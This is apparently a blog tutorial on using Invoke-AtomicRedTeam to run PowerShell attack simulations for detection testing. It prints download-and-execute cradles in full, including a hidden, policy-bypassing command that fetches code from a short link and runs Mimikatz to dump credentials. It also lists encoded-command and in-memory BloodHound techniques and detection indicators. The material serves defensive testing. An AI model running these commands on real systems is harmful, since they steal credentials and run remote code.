• Posted by: Eng. Donya Bino
• February 10, 2026

Atomic Red Team PowerShell Tests: Examples & How to Run

Atomic Red Team is an open-source library of small, focused tests mapped to the MITRE ATT&CK framework. These tests simulate real adversary behaviors to help security teams validate detection rules, EDR coverage, logging, and response capabilities.

PowerShell is one of the most common execution methods in attacks (MITRE technique T1059.001, Command and Scripting Interpreter: PowerShell), so Atomic Red Team includes many dedicated tests for it. These tests emulate techniques like downloading and executing payloads, running encoded commands, credential dumping tools, or discovery scripts, all in a safe, controlled way.

The primary way to run them is through Invoke-AtomicRedTeam, a PowerShell module that executes the tests (with setup, execution, and cleanup options).

Getting Started with Atomic Red Team for PowerShell
1. Install Invoke-AtomicRedTeam (the execution framework) Run this in PowerShell (as admin recommended for full coverage):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'); Install-AtomicRedTeam -getAtomics
This downloads the module and the full Atomic Red Team atomics folder (tests).
Or install just the module from PowerShell Gallery (no full tests needed for remote execution):
Install-Module -Name Invoke-AtomicRedTeam -Scope CurrentUser

2. Import the Module
Import-Module Invoke-AtomicRedTeam

3. List PowerShell Tests PowerShell tests are mostly under T1059.001 (but also appear in other techniques like T1086 older, or T1547 for persistence). View details:
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
Or full details:
Invoke-AtomicTest T1059.001 -ShowDetails

Common PowerShell-Focused Atomic Tests (Examples from T1059.001 and Related)
These are popular ones for testing PowerShell abuse:
1. Atomic Test #1 – Invoke Mimikatz (Credential Dumping via PowerShell) Downloads and runs a Mimikatz variant in memory (classic PowerShell cradle). Command example:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCreds"

Tests: Process creation (powershell.exe), network download, suspicious command-line args, and in-memory execution.

2. Atomic Test #3 – run BloodHound from memory using download cradle Downloads BloodHound SharpHound collector via PowerShell HTTP request and runs it in memory. Detects: Outbound connections to GitHub / raw content, SharpHound execution patterns.

3. Encoded command execution tests use Base64 encoded Powershell to evade simple command line detection. For example: 
powershell.exe -EncodedCommand <base64 string of malicious script>

Ideal for testing if your SIEM/EDR detects obfuscated ps commands.

4. Remote script download and execution Simple cradle:
powershell.exe -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1')"

Tests network + execution telemetry.

Many other techniques use PowerShell indirectly (e.g., T1547.001 Boot or Logon Autostart Execution via registry run keys set with PS, or T1113 Screen Capture via PS scripts).

Running a Test (Example)
To run a specific test safely:
Invoke-AtomicTest T1059.001 -TestNumbers 1
Add -Confirm:$false to skip prompts.

2. If your tests aren't located in the default location, be sure to use -PathToAtomicsFolder.

3. Cleanup is often automatically performed, but you should verify the need for manual cleanup through the per-test YAML files.

Practical Tips for Your Environment
1. It's best to start testing in a VM or other isolated testing machine (never in production unless approved to do so).

2. Utilize an EDR/SIEM to monitor for child processes of powershell.exe that are created by explorer.exe and cmd.exe, as well as other suspicious command-line arguments like -EncodedCommand, -WindowStyle Hidden, IEX/DownloadString, outbound communications to raw.githubusercontent.com or pastebin-like websites.

3. Test variations by running in/against Constrained Language Mode and testing with/not using AMSI enabled/disabled to identify any gaps between how the test is executed with/without those restrictions.

4. The community contributes to the Atomic Red Team by adding new tests regularly, so be sure to check GitHub for the most up-to-date tests.

Atomic Red Team’s PowerShell tests are designed to be quick to run (most take less than 5 minutes), portable in nature, and directly tied to real-world ATT&CK techniques, which makes them ideal for blue team validation, purple team exercises, and proving detection rules.